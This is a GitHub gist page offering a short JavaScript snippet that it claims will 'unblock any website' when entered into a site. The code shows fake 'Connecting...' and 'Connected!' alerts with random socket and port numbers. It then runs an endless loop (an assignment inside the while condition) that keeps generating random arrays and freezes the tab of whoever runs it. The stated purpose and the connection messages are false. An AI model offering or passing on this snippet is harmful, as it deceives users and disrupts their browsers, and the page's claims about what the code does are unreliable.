Last active
March 15, 2021 02:33
-
-
Save Github3742/7f45fd859bb53c468752645f67969e8d to your computer and use it in GitHub Desktop.
Unblock any website just enter this code into the website you want to unblock
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var socket1 = Math.floor((Math.random() * 9999) + 1); | |
var port1 = Math.floor((Math.random() * 100) + 1); | |
var connection1 = ("Socket: " + socket1 + " Port: " + port1) | |
alert("Connecting...") | |
alert("Connected!") | |
alert(connection1) | |
var looper = 1 | |
while (looper = 1) { | |
[...Array(23**2-1)].map(_=>Math.ceil(Math.random()*999999999999999999999999999999999999999999999)) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment